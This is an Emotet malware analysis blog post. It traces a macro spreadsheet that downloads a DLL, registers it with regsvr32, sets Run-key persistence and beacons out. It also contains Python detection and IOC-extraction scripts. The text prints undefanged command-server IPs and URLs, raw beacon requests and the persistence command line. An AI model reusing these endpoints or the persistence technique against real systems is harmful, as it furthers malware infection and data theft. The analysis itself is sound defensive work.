2022-03-14 Emotet Malspam

Summary
========
As part of brushing the “rust” off and getting back into the malware analysis and blogging thing, and since I have some free time while on holiday, I decided to see whether the mail filters had caught anything interesting or fun to play with. I came across an email with an encrypted zip attachment containing an Excel spreadsheet that leveraged a macro. For this post I am not digging into the macro; this will be a simple analysis post. As usual, all the artifacts from this investigation can be found over in my Github. The IOCs can be found at the end of the post or via this link here.

****NOTE****
I ran into a bug with one of the latest versions of ProcMon last night and had to re-run things to get a better version of the ProcMon logs. For that run, though, I skipped the “middle man” and just registered the malicious DLL manually to kick off the infection chain. Normally this would have been executed via the macro found in the spreadsheet once the macro was enabled. I did include both ProcMon logs for reference though. Also, any references to PID 1616 are from the first ProcMon log; PID 4776 in the second log is the equivalent of PID 1616.
***/NOTE****

Analysis
========
From a malware perspective this is a pretty straightforward compromise on both the network side and the host side.

Once the spreadsheet is downloaded and opened, Excel prompts the user to enable the malicious macro as seen below.

Once the macro has been enabled, the compromise chain starts. First, the macro downloads a DLL file from the site arkpp[.]com. The DLL is written to “C:\Users\%username%\fbd.dll” (notice the difference in names between the PCAP and once it lands on the host).

As a side note, the malware author must like dogs as you can see various dog breeds in the stream and within the binary as well.

The file is requested as “Qbazm0Hh6NAHgHzpXWnpP.dll” in the PCAP (I renamed it to 2022-03-14-emotet.dll for the “good” ProcMon log and exported it from the PCAP as 9K1.bin) but is originally named “fbd.dll” on the host, and that is the file passed to regsvr32.exe to register the malicious DLL with Windows. Once it has been registered and the initial process is running, two more child processes are spawned off the initial one, and processes are killed off automatically until only one regsvr32.exe process is running with no parent process. The interesting thing about these three processes is what they are doing/touching, as each one seems to perform a particular function with regards to filesystem and registry “touches”.

Using the “good” version of the ProcMon log, I looked at the three regsvr32.exe processes, filtering on the PIDs to see each process in isolation. Starting with PID 4104 (the parent), this one looks like it is really only meant to start up, spawn the next child process (PID 5544), and then exit, as seen below.

Jumping over to PID 5544, there is an obvious difference in what the process is doing compared to the parent. This process looks to be querying various registry settings with a noticeable pattern that, based on some quick Google searches, looks like what is called COM abuse, since I am seeing numerous queries for different CLSIDs and their INPROCSERVER32/LOCALSERVER32 values. I came across two good posts about this which can be found here and here. If this is COM abuse, it would give the malware a level of persistence. See Mitre’s ATT&CK for the TL;DR of COM abuse/hijacking. Unfortunately, using the PowerShell commands found in both posts I was not able to replicate what they were seeing with an exposed COM object on my test VM. I went back and used ProcMon to see if anything had been modified with regards to either INPROCSERVER32 or LOCALSERVER32 registry keys and could not see anything in the log. That fits: reads of CLSID and InprocServer32/LocalServer32 values are how any COM object gets activated, so on their own they are not evidence of hijacking; an actual hijack shows up as a write to a per-user CLSID key under HKCU\Software\Classes\CLSID that shadows the HKLM entry. Outside of that activity, the process does a lot of fingerprinting, as seen below.

It is also responsible for copying the original DLL (Qbazm0Hh6NAHgHzpXWnpP.dll/fbd.dll) from its original location to “C:\Users\%username%\AppData\Local\<random string>\<random string>.<random 3 characters>”, renaming it in the process, as seen below.

It then closes itself out and creates the final regsvr32.exe process (PID 4776).

The third and final regsvr32.exe process also continued the OS fingerprinting, but in addition it was reading various crypto registry keys and internet settings, and loading various DLL files related to web calls.

It then proceeded to set the persistence mechanism under the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\” registry key. The strings dump further down shows the format string %s\regsvr32.exe /s "%s\%s", which is consistent with that Run value re-launching regsvr32.exe against the renamed copy in AppData\Local.

Once this process was up and running, it started beaconing out to the C2, as seen below.
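Pulling the host-side behaviour above together, here is an added example (my own code, not from the original post and not from the malware) that checks process-creation telemetry and HKCU Run values for the pattern described: regsvr32.exe run with /s against a file under %LOCALAPPDATA% that does not carry a COM-server extension, and regsvr32.exe spawning regsvr32.exe. The event layout (dicts with pid/image/parent_image/cmdline), the Run value name and the parent of the first regsvr32.exe process are assumptions; the sample records are constructed from the command lines quoted in the strings dump.

```python
"""Added example (not code from the post): host-side checks for the
regsvr32 loader chain and the Run-key persistence described above.

Assumptions not stated on the page: telemetry arrives as dicts with
'pid', 'image', 'parent_image' and 'cmdline' keys (Sysmon/EDR style), and
Run-key entries as (value_name, value_data) pairs. All sample records are
constructed; the command lines copy the ones visible in the strings dump.
"""
import re

# regsvr32 given a file under <drive>:\Users\<user>\AppData\Local\<dir>\<name>.<ext>
# with optional switches (/s /i /n /u) and optional quotes. Case-insensitive.
REGSVR32_LOCALAPPDATA = re.compile(
    r'regsvr32(?:\.exe)?\s+(?:/[sinu]\s+)*"?'
    r'(?P<path>[a-z]:\\users\\[^\\]+\\appdata\\local\\'
    r'(?P<dir>[^"]+?)\\(?P<name>[^\\"]+?)\.(?P<ext>[a-z0-9]{1,4}))"?',
    re.IGNORECASE,
)

# Extensions a legitimate "regsvr32 <file>" normally registers.
COM_SERVER_EXTS = {"dll", "ocx", "ax", "cpl"}


def inspect_regsvr32_cmdline(cmdline):
    """Return the reasons a regsvr32 command line looks like the loader, or []."""
    m = REGSVR32_LOCALAPPDATA.search(cmdline)
    if not m:
        return []
    reasons = ["regsvr32 registering a file from %LOCALAPPDATA%"]
    if m["ext"].lower() not in COM_SERVER_EXTS:
        # Emotet used a random three-letter extension (outnpny.kzb);
        # a real COM server is almost always .dll/.ocx/.ax/.cpl.
        reasons.append("non-COM extension ." + m["ext"])
    return reasons


def regsvr32_spawned_by_regsvr32(events):
    """Events where regsvr32.exe was started by regsvr32.exe, i.e. the
    parent -> child -> grandchild chain seen in the ProcMon logs."""
    def is_regsvr32(path):
        return path.lower().endswith("\\regsvr32.exe")
    return [e for e in events
            if is_regsvr32(e["image"]) and is_regsvr32(e["parent_image"])]


def suspicious_run_values(run_values):
    """(value_name, value_data, reasons) for Run entries that relaunch
    regsvr32 against a file in %LOCALAPPDATA%."""
    hits = []
    for name, data in run_values:
        reasons = inspect_regsvr32_cmdline(data)
        if reasons:
            hits.append((name, data, reasons))
    return hits


def scan(events, run_values):
    """Combine the checks into one findings dict keyed by PID or Run value."""
    findings = {}
    for e in events:
        reasons = inspect_regsvr32_cmdline(e["cmdline"])
        if reasons:
            findings.setdefault(e["pid"], []).extend(reasons)
    for e in regsvr32_spawned_by_regsvr32(events):
        findings.setdefault(e["pid"], []).append("regsvr32 spawned by regsvr32")
    for name, _data, reasons in suspicious_run_values(run_values):
        findings.setdefault("Run\\" + name, []).extend(reasons)
    return findings


# Constructed sample telemetry. PIDs follow the post's "good" ProcMon log;
# the parent of 4104 and the Run value name are assumptions (the post only
# shows the HKCU ...\Run path, not the value name).
EXCEL = r"C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE"
RSV = r"C:\Windows\SysWOW64\regsvr32.exe"
SAMPLE_EVENTS = [
    {"pid": 4104, "image": RSV, "parent_image": EXCEL,
     "cmdline": RSV + r' /s "C:\Users\bob\fbd.dll"'},
    {"pid": 5544, "image": RSV, "parent_image": RSV,
     "cmdline": RSV + r' /s "C:\Users\bob\fbd.dll"'},
    {"pid": 4776, "image": RSV, "parent_image": RSV,
     "cmdline": RSV + r' /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"'},
    # Benign: an installer registering a system DLL from msiexec (constructed).
    {"pid": 900, "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32.exe /s "C:\Windows\System32\scrrun.dll"'},
]
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("outnpny", RSV + r' /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"'),  # name assumed
]

if __name__ == "__main__":
    for key, reasons in scan(SAMPLE_EVENTS, SAMPLE_RUN_VALUES).items():
        print(key, "->", "; ".join(reasons))
```

The first regsvr32.exe (fbd.dll in the profile root) is deliberately not flagged by the path check; it is the regsvr32-spawns-regsvr32 relationship and the AppData\Local copy with the .kzb extension that carry the signal, which is why the three checks are combined rather than relying on the command line alone.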

I went back and took a look at the “messed up” ProcMon logs, and it looks like the log itself is fine; it is just the newer version of ProcMon that is a little buggy. Anyway, looking at the initial download of the DLL via the Excel process, I noticed that the sizes recorded in ProcMon and in Wireshark are pretty close to each other.

I also used a tool called “strings2” to pull strings from the running regsvr32.exe process (PID 1616 from the first ProcMon log) and piped the output to a log file. The following are some of the more interesting strings I was able to find in this process. For example, I found some more IP addresses that look to be possible C2s. I also found an interesting string (<EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"/>) that looks to be related to application shimming. Some more Googling around and I came across another great post from the folks at Red Canary about application shims. Based on some of the info in that post, I went back to the second ProcMon log and filtered for anything with “SDB” in the path. Sure enough, there were hits for the shim database for each regsvr32.exe process. One caveat: the DBID {11111111-1111-1111-1111-111111111111} is the GUID of the built-in sysmain.sdb, which apphelp.dll consults for every process start, so matches against it for regsvr32.exe are expected on a clean system. A planted shim would instead show up as a custom .sdb (typically under C:\Windows\AppPatch\Custom) installed via sdbinst, with a corresponding entry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB, which is the place to check before calling this persistence.
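As an added example (not part of the original post), the following script automates the search done above over a strings2 dump: it pulls out URLs and IP:port pairs, parses any captured GET/POST request into host, path and cookie, base64-decodes the cookie to confirm it is an opaque binary blob rather than a readable session token, and defangs the result for a report. The "Line N: " prefix and SAMPLE_DUMP (constructed from lines quoted in this post) are assumptions about the input format.

```python
"""Added example (not code from the post): automate the strings2 search above.

Assumptions not stated on the page: the dump is plain text, one string per
line, optionally prefixed "Line N: " as in the search output. SAMPLE_DUMP is
constructed from lines quoted in this post.
"""
import base64
import binascii
import re

# URL with an IPv4 or domain host, optional port, optional path.
URL_RE = re.compile(
    r"https?://(?P<host>(?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)"
    r"(?::(?P<port>\d{1,5}))?(?P<path>/[^\s'\"<>]*)?",
    re.I,
)
# Bare IPv4 with optional port ("217.182.143.248:8080", Host: headers).
# Dotted version strings such as 5.1.0.0 also match, so review the hits.
HOSTPORT_RE = re.compile(
    r"(?<![\w.])(?P<host>(?:\d{1,3}\.){3}\d{1,3})(?::(?P<port>\d{1,5}))?(?![\w.])"
)
# A request line plus its headers, up to the first blank line.
REQUEST_RE = re.compile(
    r"^(?P<method>GET|POST) (?P<path>/\S*) HTTP/1\.[01]\r?\n"
    r"(?P<headers>(?:[^\r\n]+\r?\n)*)",
    re.M,
)


def strip_line_prefix(line):
    """Drop the 'Line 1234: ' prefix that grep-style searches add."""
    return re.sub(r"^Line \d+: ", "", line)


def extract_iocs(dump):
    """Return {'urls': [...], 'hosts': [...]}, de-duplicated and sorted."""
    urls, hosts = set(), set()
    for raw in dump.splitlines():
        line = strip_line_prefix(raw)
        for m in URL_RE.finditer(line):
            urls.add(m.group(0))
            hosts.add(m["host"] + (":" + m["port"] if m["port"] else ""))
        for m in HOSTPORT_RE.finditer(line):
            hosts.add(m["host"] + (":" + m["port"] if m["port"] else ""))
    return {"urls": sorted(urls), "hosts": sorted(hosts)}


def parse_beacons(dump):
    """Parse each GET/POST in the dump: method, path, Host header, cookie name
    and the base64-decoded cookie payload (None when it is not valid base64)."""
    beacons = []
    for m in REQUEST_RE.finditer(dump):
        headers = {}
        for h in m["headers"].splitlines():
            name, _, value = h.partition(":")
            headers[name.strip().lower()] = value.strip()
        cookie_name, _, cookie_val = headers.get("cookie", "").partition("=")
        try:
            payload = base64.b64decode(cookie_val, validate=True) if cookie_val else None
        except binascii.Error:
            payload = None
        beacons.append({"method": m["method"], "path": m["path"],
                        "host": headers.get("host"),
                        "cookie_name": cookie_name or None,
                        "cookie_bytes": payload})
    return beacons


def defang(indicator):
    """http -> hxxp and dots in the host part -> [.] for safe reporting."""
    m = URL_RE.match(indicator)
    host = m["host"] if m else indicator.split(":")[0]
    return (indicator.replace("http", "hxxp", 1)
            .replace(host, host.replace(".", "[.]"), 1))


def report(dump):
    """Defanged, de-duplicated host and URL indicators from the dump."""
    iocs = extract_iocs(dump)
    return [defang(h) for h in iocs["hosts"]] + [defang(u) for u in iocs["urls"]]


# Constructed from lines quoted in the post (strings2 output and one beacon).
SAMPLE_DUMP = """\
Line 16962: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 18469: 217.182.143.248:8080
Line 18550: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20279: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21105: https://185.4.135.27:8080/
Line 21399: https://185.4.135.27/
MSAFD Tcpip [UDP/IPv6]
GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1
Cookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY/fmRl8hDyeSAa/4Fm2pZzBzG/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==
Host: 217.182.143.248:8080
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 502 Bad Gateway
Server: nginx
"""

if __name__ == "__main__":
    for line in report(SAMPLE_DUMP):
        print(line)
    for b in parse_beacons(SAMPLE_DUMP):
        size = len(b["cookie_bytes"]) if b["cookie_bytes"] else None
        print(b["method"], b["host"], b["path"], b["cookie_name"], size)
```

A cookie whose name is a random string and whose value decodes to a few hundred bytes of non-text is the shape of an encrypted check-in, not a session identifier; together with a bare IP:8080 Host header and a random alphabetic URI it is what to pattern-match on in proxy logs rather than the exact paths, which change per request.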

While searching for keywords in the log, I also came across some bits of my own system information, as seen below.

GET GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP/1.1
Cookiez=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXgBX9QtKz6Ek3r3x7c6K3crDodv4D31dMZLNEYMHvc8rlRRPC/YH+mKNT2O
Host192.99.251.50GET /GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP/1.1
ConnectionKeep-Alive
Cache-Controlno-cache/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
BOBSXPC_B4A6FEC6

And some dead nginx sites as well.

GET /mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP/1.1
Cookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY/fmRl8hDyeSAa/4Fm2pZzBzG/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==
Host: 217.182.143.248:8080
Connection: Keep-Alive
Cache-Control: no-cache

MSAFD Irda [IrDA]
MSAFD Tcpip [UDP/IPv6]
MSAFD L2CAP [Bluetooth]
8
HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 15 Mar 2022 02:01:31 GMT
Content-Type: text/html
Content-Length: 173
Connection: keep-alive

The following sections list the other strings that I found interesting.

Query: ":8080"
---------------
Line 16962: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 16963: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17776: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17792: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 18469: 217.182.143.248:8080
Line 18503: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18543: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18550: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 18668: Host: 217.182.143.248:8080
Line 19007: https://217.182.143.248:8080/pjUXpuZmP
Line 19015: https://217.182.143.248:8080/pjUXpuZmP
Line 20396: 217.182.143.248:8080
Line 20701: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20736: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20742: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20758: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20824: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 20861: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 21105: https://185.4.135.27:8080/
Line 21274: https://185.4.135.27:8080/
Line 21317: 185.4.135.27:8080
Line 21374: 217.182.143.248:8080
Line 21379: 217.182.143.248:8080

Query: "https:"
----------------
Line 16962: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 16963: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17776: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 17792: https://217.182.143.248:8080/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR
Line 18503: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18527: https://217.182.143.248/
Line 18538: https://217.182.143.248/
Line 18543: https://217.182.143.248:8080/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
Line 18550: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 19007: https://217.182.143.248:8080/pjUXpuZmP
Line 19015: https://217.182.143.248:8080/pjUXpuZmP
Line 20279: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 20289: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 20701: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20736: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20742: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20758: https://185.4.135.27:8080/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
Line 20824: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 20861: https://217.182.143.248:8080/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
Line 21105: https://185.4.135.27:8080/
Line 21148: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21151: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21173: https://192.99.251.50/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
Line 21274: https://185.4.135.27:8080/
Line 21369: https://192.99.251.50/
Line 21372: https://192.99.251.50/
Line 21378: https://192.99.251.50/
Line 21380: https://192.99.251.50/
Line 21398: https://192.99.251.50/
Line 21399: https://185.4.135.27/
Line 21401: https://185.4.135.27/

Query: "regsvr32.exe"
----------------------
Line 28: \regsvr32.exe
Line 345: REGSVR32.EXE
Line 1918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 2083: Microsoft.Windows.RegSvr32,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\SysWOW64\regsvr32.exe
Line 2190: C:\Windows\SysWOW64\regsvr32.exe
Line 2259: The module "%1" may not compatible with the version of Windows that you're running. Check if the module is compatible with an x86 (32-bit) or x64 (64-bit) version of regsvr32.exe.
Line 2283: REGSVR32.EXE.MUI
Line 2431: C:\Windows\SysWOW64\regsvr32.exe
Line 13917: C:\Windows\SysWOW64\regsvr32.exe
Line 13918: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 13919: C:\Windows\SysWOW64\regsvr32.exe
Line 16665: C:\Windows\SysWOW64\regsvr32.exe
Line 16666: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16667: C:\Windows\SysWOW64\regsvr32.exe
Line 16732: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
Line 16737: C:\Windows\Temp\AslLog_ApphelpDebug_regsvr32.exe_1616.txt
Line 16742: C:\Windows\Temp\AslLog_shimengstate_regsvr32.exe_1616.txt
Line 16744: C:\Windows\Temp\AslLog_ShimDebugLog_regsvr32.exe_1616.txt
Line 16765: <EXE NAME="regsvr32.exe" ID="{c7a85eba-c2d1-41ec-c656-ca2c9221e354}" DBID="{11111111-1111-1111-1111-111111111111}"/>
Line 16980: C:\Windows\SysWOW64\regsvr32.exe
Line 17180: regsvr32.exe
Line 17188: regsvr32.exe
Line 17255: C:\Windows\SysWOW64\regsvr32.exe
Line 17256: \Device\HarddiskVolume1\Windows\SysWOW64\regsvr32.exe
Line 17327: C:\Windows\SysWOW64\regsvr32.exe
Line 19955: regsvr32.exe
Line 21257: %s\regsvr32.exe /s "%s\%s"
Line 22836: regsvr32.exe:1616 Properties
Line 23048: regsvr32.exe(00000650) (netsvcs) Properties
Line 23166: C:\Windows\SysWOW64\regsvr32.exe
Line 36483: C:\Windows\SysWOW64\regsvr32.exe
Line 46610: [zC:\Windows\SysWOW64\regsvr32.exe
Line 378706: regsvr32.exe
Line 612840: C:\Windows\SysWOW64\regsvr32.exe

Query: "c7a85eba-c2d1-41ec-c656-ca2c9221e354" and the lines around that 
---------------------------------------------------------------------------
=C:=C:\Users\bob\Desktop
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\bob\AppData\Roaming
ChocolateyInstall=C:\ProgramData\chocolatey
ChocolateyLastPathUpdate=132853495844597753
ChocolateyToolsLocation=C:\Tools
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=BOBS-PC
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\bob
JAVA_HOME=C:\Program Files\OpenJDK\openjdk-11.0.13_8
LOCALAPPDATA=C:\Users\bob\AppData\Local
LOGONSERVER=\\BOBS-PC
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\bob\OneDrive
OS=Windows_NT
Path=C:\Program Files\Microsoft Office 15\Root\Office15\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Python37\Scripts\;C:\Python37\;C:\Python27\;C:\Python27\Scripts;C:\ProgramData\Boxstarter;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\ProgramData\chocolatey\bin;C:\Program Files\Puppet Labs\Puppet\bin;C:\Program Files\OpenJDK\openjdk-11.0.13_8\bin;C:\Program Files\nodejs\;C:\Program Files\Microsoft VS Code\bin;C:\Users\bob\AppData\Local\Microsoft\WindowsApps;C:\Tools\Cmder;;C:\ProgramData\chocolatey\lib\radare2.flare\tools\radare2\bin;C:\Tools\java-deobfuscator-gui;C:\Tools\Bytecode-Viewer;C:\Program Files (x86)\Nmap;C:\ProgramData\chocolatey\lib\rawcap\tools\rawcap;C:\Tools\pyinstxtractor;C:\Tools\oledump;C:\Tools\rtfdump;C:\Tools\msoffcrypto-crack;C:\Program Files (x86)\pdfid;C:\Program Files (x86)\pdfparser;C:\pdfstreamdumper;C:\iDefense\SysAnalyzer;C:\Users\bob\AppData\Local\Programs\Fiddler;C:\Users\bob\AppData\Roaming\npm;C:\Program Files\Microsoft Office 15\root\Client
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 140 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8c01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=FLARE$S$d$s$t$_$p$+$g
PSModulePath=C:\Users\bob\Documents\WindowsPowerShell\Modules
PUBLIC=C:\Users\Public
RAW_TOOLS_DIR=C:\Tools
SESSIONNAME=Console
SSLKEYLOGFILE=C:\Users\bob\Documents\ssl-keys.log
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\bob\AppData\Local\Temp
TMP=C:\Users\bob\AppData\Local\Temp
TOOL_LIST_DIR=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FLARE
TOOL_LIST_SHORTCUT=C:\Users\bob\Desktop\FLARE.lnk
USERDOMAIN=BOBS-PC
USERDOMAIN_ROAMINGPROFILE=BOBS-PC
USERNAME=bob
USERPROFILE=C:\Users\bob
VM_COMMON_DIR=C:\ProgramData\FEVM
windir=C:\Windows
_NT_SYMBOL_PATH=symsrv*symsrv.dll*C:\symbols*http://msdl.microsoft.com/download/symbols
C:\Users\bob\Desktop\
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe /s "C:\Users\bob\AppData\Local\Emehnrnpmefb\outnpny.kzb"
C:\Windows\SysWOW64\regsvr32.exe
Winsta0\Default
=::=::\
=C:=C:\Users\bob\Desktop
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\bob\AppData\Roaming
ChocolateyInstall=C:\ProgramData\chocolatey
ChocolateyLastPathUpdate=132853495844597753
ChocolateyToolsLocation=C:\Tools
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=BOBS-PC
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\bob
JAVA_HOME=C:\Program Files\OpenJDK\openjdk-11.0.13_8
LOCALAPPDATA=C:\Users\bob\AppData\Local
LOGONSERVER=\\BOBS-PC
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\bob\OneDrive
OS=Windows_NT
